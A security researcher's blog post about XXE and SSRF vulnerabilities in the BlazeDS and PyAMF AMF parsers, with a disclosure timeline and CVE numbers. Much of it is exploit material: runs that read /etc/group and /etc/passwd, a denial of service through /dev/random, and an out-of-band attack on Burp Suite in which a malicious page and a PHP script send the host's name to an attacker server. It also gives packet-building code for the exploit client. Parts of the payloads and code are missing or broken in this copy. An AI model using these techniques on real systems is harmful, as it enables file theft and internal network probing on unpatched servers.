AMF parsing and XXE | Agarri : Sécurité informatique offensive

AMF parsing and XXE

I recently played with two libraries parsing the AMF (aka Action Message Format) binary format: BlazeDS and PyAMF. Both libraries were affected by XXE and SSRF vulnerabilities. In fact, I found the vulnerability affecting PyAMF while developing an exploit for the BlazeDS’s one 😉

First, a timeline:
– March 2015: publication by the Apache Software Foundation of BlazeDS 4.7.0, their first release. Prior versions were published by Adobe (who donated the code to the ASF)
– August 2015: publication of BlazeDS 4.7.1 including a patch for CVE-2015-3269, a XXE vulnerability disclosed by
Matthias Kaiser
– October 2015: publication of Burp Suite 1.6.29 including an upgrade to BlazeDS 4.7.1 and disabling AMF parsing by default
– November 2015: publication of BlazeDS 4.7.2 including a patch for CVE-2015-5255, a SSRF vulnerability disclosed by James Kettle
– December 2015: publication of Burp Suite 1.6.31 including an upgrade to BlazeDS 4.7.2
– December 2015: publication of PyAMF 0.8 including a patch for CVE-2015-8549, a XXE/SSRF vulnerability disclosed by myself

The basic AMF client I wrote can by used to exploit both libraries. I’ll cover three setups:
– the target is an AMF gateway based on PyAMF and hosting a service echoing back its input
– the target is an AMF gateway running Java and BlazeDS
– the target is a Java client (here Burp Suite 1.6.28) running BlazeDS

Please note that the second scenario is the more prevalent one, being similar to unpatched products from Adobe (ColdFusion and LiveCycle Data Services), VMware (vCenter Server, vCloud Director and Horizon View) and other vendors.

The following code will run an AMF gateway hosting two services, “echo” and “42” (download it from here). You will need to install the PyAMF module first, either from PIP (“pip install pyamf”), Github (clone this repo then “python install”) or your preferred packet manager (“apt-get install python-pyamf” under Ubuntu).

# Configuration #

port = 8081
ip = ''

# Proposed AMF services #

def echo(data):
    return data

def fortytwo(data):
    sentence = """
	What do you get if you multiply six by nine?
	Six by nine. Forty two.
	That's it. That's all there is.
	I always thought something was fundamentally wrong with the universe."""
    return sentence

services = { 'echo': echo, '42': fortytwo }

# Main code #

if __name__ == '__main__':

    from pyamf.remoting.gateway.wsgi import WSGIGateway
    from wsgiref import simple_server
    from pyamf import _version

    gw = WSGIGateway(services)
    httpd = simple_server.WSGIServer((ip, port), simple_server.WSGIRequestHandler)

    def app(environ, start_response):
        return gw(environ, start_response)


    print '[+] AMF gateway starting on %s:%d' % (ip, port)
    print '[+] PyAMF version: v%s' % str(_version.version)

    except KeyboardInterrupt:
	print '[+] Bye!'

Let’s send to the “echo” service an AMF message containing some XML:

$ ./ echo internal
[+] Target URL: ''
[+] Target service: 'echo'
[+] Payload 'internal': ' ]>Internal entity: &foo;'
[+] Sending the request...
[+] Response code: 200
[+] Body:
........foobar/onResult..null......CInternal entity: Some text
[+] Done

As we can see in the response, the internal entity named “foo” is resolved. This looks promising! Now let’s try with an external entity pointing to /etc/group:

$ ./ echo ext_group
[+] Target URL: ''
[+] Target service: 'echo'
[+] Payload 'ext_group': ' ]>External entity 1: &foo;'
[+] Sending the request...
[+] Response code: 200
[+] Body:
........foobar/onResult..null.......iExternal entity 1: root:x:0:

[+] Done

Great, PyAMF is vulnerable to XXE! However, if there’s no AMF service echoing back its input, possibilities are limited because #1 remote URLs are disabled (at least on my testbed) #2 no fancy URL handlers are available #3 generic error messages are used. At least, DoSing the server by requesting /dev/random is doable even if available services are unknown, because AMF parsing happens before AMF routing:

$ ./ wtf ext_rand
[+] Target URL: ''
[+] Target service: 'wtf'
[+] Payload 'ext_rand': ' ]>External entity 2: &foo;'
[+] Sending the request...
[!] Connection OK, but a timeout was reached...
[+] Done

BlazeDS is much easier to exploit than PyAMF because we can use #1 Java URL handlers (http, ftp, jar, …) to SSRF the internal network or retrieve a dynamic DTD #2 verbose error messages to leak information #3 directory listing via “file///” to locate interesting files. And like for PyAMF, we don’t need to know the name of an existing service… The testbed is based on a nightly build (in turnkey format) from 2011. Unzip the archive, move to the Tomcat “bin” directory and execute “”: you can now access a (super old) AMF gateway at

Exploitation is trivial: retrieve an external DTD, read a local file and construct, from its content, an invalid URL (with protocol “_://”) which will be displayed in error messages:

$ ./  foo prm_url
[+] Target URL: ''
[+] Target service: 'foo'
[+] Payload 'prm_url': ' %foo; ]>Parameter entity 3'
[+] Sending the request...
[+] Response code: 200
[+] Body:
.Siflex.messaging.messages.ErrorMessage.headers.rootCause body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
........[Error deserializing XML type no protocol: _://root:x:0:0:root:/root:/bin/bash
[+] Done

Dynamic DTD leaking /etc/passwd via error messages:


Another dynamic DTD, leaking Tomcat logs:


Looking at Burp Suite, it appears that we first have to trigger AMF parsing. On old vulnerable versions, having a response with “Content-Type: application/x-amf” going through the Proxy tool is enough. Given we don’t have access to Burp error messages, we’ll use a dynamic DTD and OOB communications to send data to a third-party server.

Malicious Web page loading an invisible “image”:

Burp Suite + BlazeDS

Script “img.php” emitting a AMF response loading a remote DTD via parameter entities:

 %dtd; ]>";
    $xml_sz = pack('N', strlen($xml));
    return ($header . $xml_sz . $xml);	

header('Content-Type: application/x-amf');


Dynamic DTD leaking /etc/hostname to a remote server:


In the attacker’s logs, we can see the requests made by the browser and by the BlazeDS library:

"GET /burp-xxe/img.php HTTP/1.1" 200 301 "http://malicious/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:41.0) Gecko/20100101 Firefox/41.0"
"GET /burp-xxe/dyndtd.xml HTTP/1.1" 200 423 "-" "Java/1.8.0_65"
"GET /burp-xxe/burped?demobox HTTP/1.1" 404 437 "-" "Java/1.8.0_65"

And we learned that the vulnerable Burp Suite instance was running “Java 1.8.0_65” on a machine named “demobox”.

Constructing AMF packets is quite easy: the specifications are public (AMF0 and AMF3) and reading Wikipedia may be just as good.

An AMF packet includes a version number, some headers (none here) and some bodies (one here):

version = '\x00\x03' # Version
headers="\x00\x00" # No headers
bodies="\x00\x01" + body # One body
packet = version + headers + bodies

Inside the body, we need a valid “target_uri” in order to hit business-specific features. If we are interested only in AMF and XML parsing, any value can be used:

target_uri = encode(svc) # Target URI
response_uri = encode('foobar') # Response URI
sz_msg = struct.pack("!L", len(msg))
body = target_uri + response_uri + sz_msg + msg

The message itself is very basic: a single-entry AMF array containing the XML document:

array_with_one_entry = '\x0a' + '\x00\x00\x00\x01' # AMF0 Array
msg = array_with_one_entry + encode(xml_str, xml=True)

All strings (URI and XML) are encoded and prefixed with their size:

def encode(string, xml=False):
        string = string.encode('utf-8')
        if xml:
                const="\x0f" # AMF0 XML document
                size = struct.pack("!L", len(string)) # Size on 4 bytes
                const="" # AMF0 URI
                size = struct.pack("!H", len(string)) # Size on 2 bytes
        return const + size + string

The full script can be download from this URL. Enjoy!

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